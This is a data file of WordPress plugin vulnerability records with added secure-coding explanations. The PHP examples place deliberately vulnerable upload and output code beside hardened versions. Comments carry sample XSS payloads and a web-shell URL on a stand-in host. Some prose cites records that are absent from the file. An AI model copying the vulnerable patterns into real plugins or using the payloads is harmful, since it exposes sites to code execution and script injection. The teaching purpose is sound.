{"CVE_ID":"CVE-2025-22802","slug":"yeemail","versionImpact":"2.1.4","versionEndExcluding":"2.1.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in add-ons.org Email Templates Customizer for WordPress \u2013 Drag And Drop Email Templates Builder \u2013 YeeMail allows Stored XSS.This issue affects Email Templates Customizer for WordPress \u2013 Drag And Drop Email Templates Builder \u2013 YeeMail: from n\/a through 2.1.4.","recommendation":"Update to version 2.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/yeemail\\\/vulnerability\\\/wordpress-email-templates-customizer-yeemail-plugin-2-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/yeemail\\\/vulnerability\\\/wordpress-email-templates-customizer-yeemail-plugin-2-1-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4521","slug":"import-xml-feed","versionEndExcluding":"2.1.5","description":"The Import XML and RSS Feeds WordPress plugin before 2.1.5 contains a web shell, allowing unauthenticated attackers to perform RCE. The plugin\/vendor was not compromised and the files are the result of running a PoC for a previously reported issue (https:\/\/wpscan.com\/vulnerability\/d4220025-2272-4d5f-9703-4b2ac4a51c42) and not deleting the created files when releasing the new version.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de2cdb38-3a9f-448e-b564-a798d1e93481\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de2cdb38-3a9f-448e-b564-a798d1e93481\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12468","slug":"wp-datepicker","versionImpact":"2.1.4","versionEndExcluding":"2.1.5","description":"The WP Datepicker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpdp_get_selected_datepicker' parameter in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L271\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L359\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L359\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L361\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L361\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L377\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L377\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L401\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L401\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L402\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L402\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L408\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L408\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L409\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L409\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L415\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L415\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L416\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L416\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L423\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L423\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L552\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L552\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L553\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-datepicker\\\/tags\\\/2.1.3\\\/inc\\\/wpdp_settings.php#L553\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210616%40wp-datepicker&new=3210616%40wp-datepicker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3210616%40wp-datepicker&new=3210616%40wp-datepicker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212312%40wp-datepicker&new=3212312%40wp-datepicker&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212312%40wp-datepicker&new=3212312%40wp-datepicker&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6b61731-ded2-4ac1-83f6-686daf92441e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6b61731-ded2-4ac1-83f6-686daf92441e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45069","slug":"gallery-videos","versionEndExcluding":"2.1.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Video Gallery by Total-Soft Video Gallery \u2013 Best WordPress YouTube Gallery Plugin allows SQL Injection.This issue affects Video Gallery \u2013 Best WordPress YouTube Gallery Plugin: from n\/a through 2.1.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gallery-videos\\\/wordpress-gallery-video-plugin-2-0-2-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gallery-videos\\\/wordpress-gallery-video-plugin-2-0-2-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0699","slug":"ai-engine","versionImpact":"2.1.4","versionEndExcluding":"2.1.5","description":"The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'add_image_from_url' function in all versions up to, and including, 2.1.4. This makes it possible for authenticated attackers, with Editor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3021494\\\/ai-engine\\\/trunk\\\/classes\\\/core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3021494\\\/ai-engine\\\/trunk\\\/classes\\\/core.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13801","slug":"bwl-advanced-faq-manager","versionImpact":"2.1.4","versionEndExcluding":"2.1.5","description":"The BWL Advanced FAQ Manager plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the 'baf_set_notice_status' AJAX action in all versions up to, and including, 2.1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to '1' on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true such as registration.","recommendation":"Update to version 2.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/bwl-advanced-faq-manager\\\/5007135\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/bwl-advanced-faq-manager\\\/5007135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3a84201-6cd8-4528-ae7a-7fd813c8da18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3a84201-6cd8-4528-ae7a-7fd813c8da18?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1332","slug":"custom-fonts","versionImpact":"2.1.4","versionEndExcluding":"2.1.5","description":"The Custom Fonts \u2013 Host Your Fonts Locally plugin for WordPress is vulnerable to Stored Cross-Site Scripting via svg file upload in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author level or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98536242-64c7-4e02-aa00-a3efbf5c90d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98536242-64c7-4e02-aa00-a3efbf5c90d8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074871%40custom-fonts%2Ftrunk&old=3062686%40custom-fonts%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3074871%40custom-fonts%2Ftrunk&old=3062686%40custom-fonts%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-56245","slug":"premium-blocks-for-gutenberg","versionImpact":"2.1.42","versionEndExcluding":"2.1.43","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Leap13 Premium Blocks \u2013 Gutenberg Blocks for WordPress allows Stored XSS.This issue affects Premium Blocks \u2013 Gutenberg Blocks for WordPress: from n\/a through 2.1.42.","recommendation":"Update to version 2.1.43, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/premium-blocks-for-gutenberg\\\/vulnerability\\\/wordpress-premium-blocks-plugin-2-1-42-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/premium-blocks-for-gutenberg\\\/vulnerability\\\/wordpress-premium-blocks-plugin-2-1-42-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4716","slug":"wp-popups-lite","versionEndExcluding":"2.1.4.8","description":"The WP Popups WordPress plugin before 2.1.4.8 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/24176ad3-2317-4853-b4db-8394384d52cd\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/24176ad3-2317-4853-b4db-8394384d52cd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
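Every record in this file carries a `slug`, usually a `versionImpact`, and a `versionEndExcluding`, and the records directly above show why matching them against an installed version needs a real version comparison rather than a string one: Premium Blocks goes 2.1.33, 2.1.42, 2.1.43, and WP Popups has fixes at 2.1.4.8 and 2.1.5.1. The block below is an added example of a consumer of such records; it is not Security Ninja's code. The field semantics it applies (an installed version is affected when it is below `versionEndExcluding`; `versionImpact` is the last release the advisory confirmed affected and is not used as a bound) are an assumption drawn from the `recommendation` strings. The sample records are constructed copies of entries above, trimmed to the fields the check reads.

```php
<?php
// Added example: a consumer of records shaped like the ones in this file. It is
// not Security Ninja's code. Assumed field semantics, taken from the
// "recommendation" strings above: an installed version is affected when it is
// below versionEndExcluding; versionImpact, when present, is the last release
// the advisory confirmed as affected (informational here, not a bound).

/** True when $installed of plugin $slug falls inside the range of $record. */
function record_matches(array $record, string $slug, string $installed): bool {
    if (($record['slug'] ?? null) !== $slug) {
        return false;
    }
    $fixed = $record['versionEndExcluding'] ?? null;
    if ($fixed === null) {
        return true;                      // no fix known: every version is in scope
    }
    // version_compare() is what WordPress uses for plugin versions. It compares
    // dot-separated components numerically, so 2.1.5 < 2.1.42 and 2.1.5 < 2.1.5.1,
    // whereas a string comparison would rank "2.1.5" above "2.1.43".
    return version_compare($installed, $fixed, '<');
}

/** Map each installed plugin slug to the CVE IDs whose range covers it. */
function scan_plugins(string $jsonl, array $installed): array {
    $hits = [];
    foreach (preg_split('/\R/', trim($jsonl)) as $line) {
        $record = json_decode($line, true);
        if (!is_array($record) || empty($record['CVE_ID'])) {
            continue;                     // skip wrapped or truncated lines instead of aborting the scan
        }
        foreach ($installed as $slug => $version) {
            if (record_matches($record, $slug, $version)) {
                $hits[$slug][] = $record['CVE_ID'];
            }
        }
    }
    return $hits;
}

// Constructed sample: three records modelled on entries above, cut down to the
// fields the check reads.
$sample = <<<'JSONL'
{"CVE_ID":"CVE-2024-56245","slug":"premium-blocks-for-gutenberg","versionImpact":"2.1.42","versionEndExcluding":"2.1.43"}
{"CVE_ID":"CVE-2024-47368","slug":"premium-blocks-for-gutenberg","versionImpact":"2.1.33","versionEndExcluding":"2.1.34"}
{"CVE_ID":"CVE-2023-1905","slug":"wp-popups-lite","versionEndExcluding":"2.1.5.1"}
JSONL;

$installed = [
    'premium-blocks-for-gutenberg' => '2.1.5',  // older than both fixes despite sorting after "2.1.43" as a string
    'wp-popups-lite'               => '2.1.5',  // one release short of 2.1.5.1
    'wp-datepicker'                => '2.1.5',  // no record in the sample
];
print_r(scan_plugins($sample, $installed));
```

With these inputs both Premium Blocks CVEs and the WP Popups one are reported and WP Datepicker gets no entry. A scanner that compared versions as strings would report nothing for Premium Blocks at 2.1.5, which is the failure mode the sample is built to surface.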
{"CVE_ID":"CVE-2024-11331","slug":"isee-products-extractor","versionImpact":"2.1.3","versionEndExcluding":"2.1.4","description":"The ??????? ??????? ??????? ???? ???? plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.1.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L99\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/isee-products-extractor\\\/tags\\\/2.1.2\\\/admin\\\/pages\\\/products_list.php#L99\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af0cc02a-b6dd-4058-b686-9c9a3a4a5962?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af0cc02a-b6dd-4058-b686-9c9a3a4a5962?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12617","slug":"wc-price-history","versionImpact":"2.1.3","versionEndExcluding":"2.1.4","description":"The WC Price History for Omnibus plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX actions in all versions up to, and including, 2.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view and modify history data.","recommendation":"Update to version 2.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209687%40wc-price-history&new=3209687%40wc-price-history&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3209687%40wc-price-history&new=3209687%40wc-price-history&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b380b053-9847-48a8-ba12-d07db9df2baf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b380b053-9847-48a8-ba12-d07db9df2baf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4300","slug":"import-xml-feed","versionEndExcluding":"2.1.4","description":"The Import XML and RSS Feeds WordPress plugin before 2.1.4 does not filter file extensions for uploaded files, allowing an attacker to upload a malicious PHP file, leading to Remote Code Execution.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4220025-2272-4d5f-9703-4b2ac4a51c42\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4220025-2272-4d5f-9703-4b2ac4a51c42\",\"refsource\":\"MISC\",\"tags\":[]}]"}
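Three records above are variations on one mistake: AI Engine's `add_image_from_url` saved a remote file without checking its type, Import XML and RSS Feeds did not filter upload extensions (and then shipped the resulting web shell in a release, per CVE-2023-4521), and Custom Fonts accepted SVG, which is XML that can carry script. The block below is an added example, not any of those plugins' code; the `myplugin_` helper names and the "fetch an image by URL" scenario are hypothetical, and it assumes it is loaded inside WordPress. It shows the unsafe save beside a version that lets core fetch and sideload the file and accepts it only when extension and sniffed MIME type agree on an allow-listed image type.

```php
<?php
// Added example (hypothetical "add image from URL" helper; not AI Engine's,
// Import XML and RSS Feeds' or Custom Fonts' code). Assumes WordPress is loaded.

// Vulnerable shape: the remote file is stored under whatever name the URL path
// ends with, so https://evil.example/shell.php lands as an executable file
// inside wp-content/uploads.
function myplugin_add_image_from_url_unsafe(string $url): string {
    $upload = wp_upload_dir();
    $dest   = $upload['path'] . '/' . basename(parse_url($url, PHP_URL_PATH));
    file_put_contents($dest, wp_remote_retrieve_body(wp_remote_get($url)));
    return $dest;
}

// Hardened shape: core downloads to a temp file, the type is verified from the
// content as well as the name, and only allow-listed image types are sideloaded.
function myplugin_add_image_from_url_safe(string $url) {
    require_once ABSPATH . 'wp-admin/includes/file.php';   // download_url(), wp_handle_sideload()
    require_once ABSPATH . 'wp-admin/includes/media.php';
    require_once ABSPATH . 'wp-admin/includes/image.php';

    if (!current_user_can('upload_files')) {
        return new WP_Error('forbidden', 'not allowed to upload files');
    }
    $tmp = download_url($url);                    // validates the URL and fetches to a temp file
    if (is_wp_error($tmp)) {
        return $tmp;
    }
    $name = sanitize_file_name(basename(parse_url($url, PHP_URL_PATH)));

    // Allow-list of image types. SVG is deliberately absent: it is XML that can
    // embed <script>, which is the Custom Fonts stored-XSS case above.
    $allowed = [
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
        'webp'     => 'image/webp',
    ];
    // Checks the extension against the sniffed MIME type; a mismatch yields an
    // empty type (rejected) or a corrected proper_filename.
    $check = wp_check_filetype_and_ext($tmp, $name, $allowed);
    if (empty($check['ext']) || empty($check['type'])) {
        @unlink($tmp);
        return new WP_Error('bad_type', 'file is not an allowed image type');
    }
    if (!empty($check['proper_filename'])) {
        $name = $check['proper_filename'];
    }

    $file = [
        'name'     => $name,
        'type'     => $check['type'],
        'tmp_name' => $tmp,
        'error'    => 0,
        'size'     => filesize($tmp),
    ];
    // wp_handle_sideload() repeats the type checks, limits types to 'mimes', and
    // moves the file into the uploads directory under a unique name.
    $result = wp_handle_sideload($file, ['test_form' => false, 'mimes' => $allowed]);
    if (isset($result['error'])) {
        @unlink($tmp);
        return new WP_Error('sideload_failed', $result['error']);
    }
    return $result['file'];                       // absolute path of the stored image
}
```

The capability check at the top is not decorative: the AI Engine record limits exploitation to Editors because the function at least required a logged-in user with that role, while Import XML and RSS Feeds needed no account at all. Type validation closes the RCE path; the capability check decides who can even reach it.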
{"CVE_ID":"CVE-2022-4826","slug":"simple-tooltips","versionEndExcluding":"2.1.4","description":"The Simple Tooltips WordPress plugin before 2.1.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59fa32d2-aa66-4980-9ee5-0a7513f3a2b0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/59fa32d2-aa66-4980-9ee5-0a7513f3a2b0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
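The XSS records above fall into two output-escaping sinks. Stored: shortcode attributes (WP Popups' `spu-facebook-page` `href`, Simple Tooltips, DethemeKit's widget URL) are written into HTML by anyone who can place a shortcode, which includes Contributors. Reflected: the WP Matterport Shortcode record echoes `PHP_SELF`, and the isee-products-extractor record builds links with `add_query_arg`/`remove_query_arg`, both of which carry the request URL, unescaped, into an attribute. The block below is an added example, not any of those plugins' code; the `my-link` shortcode and the settings form are hypothetical, and it assumes it is loaded as a WordPress plugin. Each sink is shown unescaped and then with the context-correct escaping function.

```php
<?php
// Added example (hypothetical shortcode and settings form; not any plugin's code).
// Assumes WordPress is loaded; the "my-link" shortcode and page slug are made up.

// --- Stored XSS through shortcode attributes -------------------------------
// Contributors can place shortcodes in posts, so every attribute is untrusted.
function my_link_shortcode_unsafe($atts) {
    $atts = shortcode_atts(['href' => '', 'label' => ''], $atts);
    // href="javascript:alert(1)" and label="<img src=x onerror=...>" go out verbatim.
    return '<a href="' . $atts['href'] . '">' . $atts['label'] . '</a>';
}

function my_link_shortcode_safe($atts) {
    $atts = shortcode_atts(['href' => '', 'label' => ''], $atts);
    // esc_url(): only allowed protocols survive (javascript: collapses to ""),
    // quotes are encoded so the attribute cannot be closed early.
    // esc_html(): text context, angle brackets and quotes become entities.
    return sprintf('<a href="%s">%s</a>', esc_url($atts['href']), esc_html($atts['label']));
}
add_shortcode('my-link', 'my_link_shortcode_safe');

// --- Reflected XSS through PHP_SELF / add_query_arg -------------------------
function settings_form_unsafe(): string {
    // PHP_SELF includes PATH_INFO, so a request to
    // /wp-admin/admin.php/"><script>...</script> puts the payload in the attribute.
    // add_query_arg() with no URL argument builds on REQUEST_URI in the same way.
    $action = add_query_arg('page', $_GET['page']);
    return '<form method="post" action="' . $_SERVER['PHP_SELF'] . '">'
         . '<a href="' . $action . '">reload</a></form>';
}

function settings_form_safe(): string {
    // Build the URL from a known base instead of the request, then escape it
    // for attribute context. esc_url() is still required even with a fixed
    // base, because add_query_arg() returns an unescaped URL by design.
    $action = esc_url(add_query_arg(['page' => 'my-plugin-settings'],
                                    admin_url('options-general.php')));
    return '<form method="post" action="' . $action . '">'
         . wp_nonce_field('my_plugin_save', '_mpnonce', true, false)
         . '<a href="' . $action . '">reload</a></form>';
}
```

The rule these records share is that the escaping function is chosen by the output context, not by the input: `esc_url()` for URLs in attributes, `esc_attr()` for other attribute values, `esc_html()` for text, `wp_kses_post()` where some markup must survive. Sanitising on input (`sanitize_text_field()` and friends) is a separate layer and does not replace escaping at the sink.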
{"CVE_ID":"CVE-2024-4374","slug":"dethemekit-for-elementor","versionImpact":"2.1.3","versionEndExcluding":"2.1.4","description":"The DethemeKit For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 2.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcd9384c-5af3-4544-8179-c2f5550dd152?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcd9384c-5af3-4544-8179-c2f5550dd152?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3088000%40dethemekit-for-elementor&new=3088000%40dethemekit-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3088000%40dethemekit-for-elementor&new=3088000%40dethemekit-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0501","slug":"wp-insurance","versionEndExcluding":"2.1.4","description":"The WP Insurance WordPress plugin before 2.1.4 does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36fd6c0d-3f0c-4f7d-aa17-5b2d084ab94c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36fd6c0d-3f0c-4f7d-aa17-5b2d084ab94c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
